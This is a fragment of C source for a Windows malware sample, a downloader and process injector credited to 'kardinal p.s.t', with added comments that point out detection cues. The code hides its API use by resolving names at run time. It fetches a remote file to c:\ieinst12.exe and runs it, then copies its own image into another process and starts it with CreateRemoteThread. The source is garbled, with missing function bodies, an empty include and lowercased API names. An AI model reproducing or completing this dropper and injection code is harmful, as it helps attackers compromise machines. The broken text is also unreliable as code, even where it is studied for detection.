/* "mini_**********"
code by kardinal p.s.t
compiled with VC++ 6.0
cannot run under Win98;
*/ #include
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/opt:nowin98") //取消這4行的注釋,可編譯出2k大的檔案
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/entry:decrpt")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/base:0x13150000")
/*
 * Downloader stage (fragment: the enclosing function's header, and the
 * LoadLibrary calls that would fill hshell/hurlmon, are not on this page).
 * Defender note: the three Win32 APIs below are resolved by name at run time
 * through GetProcAddress, so none of them shows up in the executable's static
 * import table; an import-table scan will not reveal them, run-time API
 * monitoring (LoadLibrary/GetProcAddress of these names) will.
 */
hinstance (winapi *shellrun)(hwnd,lpctstr, lpctstr, lpctstr ,lpctstr , int );// dynamically resolved ShellExecuteA from shell32.dll
dword (winapi *downfile) (lpctstr ,lpctstr, lpctstr ,dword, lpctstr);// dynamically resolved URLDownloadToFileA from urlmon.dll
handle (winapi *myinject) (handle, lpsecurity_attributes, dword,lpthread_start_routine, lpvoid, dword, lpdword); // dynamically resolved CreateRemoteThread: create a thread in another process and run it
handle processhandle; // handle of the injection target process (the code that opens it is not visible here)
dword pid;            // target process id (assignment not visible here)
hinstance hshell,hurlmon,hkernel; // module handles; in the visible code only hkernel is ever loaded (see main)
(farproc&)shellrun=getprocaddress(hshell,"shellexecutea");
(farproc&)downfile= getprocaddress(hurlmon,"urldownloadtofilea");
// Drop step: fetch a remote file (URL redacted on the page) to a fixed local
// path and launch it.  c:\ieinst12.exe is this sample's on-disk indicator; the
// URLDownloadToFile-then-ShellExecute pair is the behavioural one.
downfile(null," ... eeeeen/notepad.exe","c:\\ieinst12.exe",0, null);
shellrun(0,"open","c:\\ieinst12.exe",null,null,5);// show command 5 (SW_SHOW): the dropped file runs visibly
exitprocess(0);
}; void main() // main function: injector stage (fragment; the opening brace and the steps before "size=" are missing from this page)
/*
 * Visible steps: reserve executable+writable memory in the target process at
 * the same address this module occupies, copy this module's image into it,
 * and start a remote thread inside it.  Defender note: the
 * VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory ->
 * CreateRemoteThread sequence against another process is the classic
 * process-injection pattern; Sysmon event 8 (CreateRemoteThread) and
 * event 10 (ProcessAccess) are the usual telemetry for it, and RWX
 * allocations in a foreign process are a strong signal on their own.
 */
; size=(dword)lpimagesize; // image size to copy (where lpimagesize is computed is not visible)
newmodule = virtualallocex(processhandle, module, size, mem_commit | mem_reserve, page_execute_readwrite); // request the same base address as this module so the copied image needs no relocation -- presumably why the /base linker option above pins the image base; confirm
//4. write memory, create the thread
writeprocessmemory(processhandle, newmodule, module, size, null);// copy the image
lpthread_start_routine entrypoint;
__asm
// NOTE: the inline-assembly block that presumably sets entrypoint is missing from this page
hkernel=loadlibrary("kernel32.dll");
(farproc&)myinject= getprocaddress(hkernel,"createremotethread");
myinject(processhandle, null, 0, entrypoint, module, 0, null); // create the remote thread and run it; the thread parameter is the module base
//5. close objects
closehandle(processhandle);
return;
} ;
// decryption function -- the program entry point according to the
// /entry:decrpt linker option above.  Its body is garbled on this page:
// a __try block is expected before the __except but is not visible, so
// what is decrypted, and how, cannot be determined from here.
void decrpt()
__except(exception_execute_handler)
} return;
};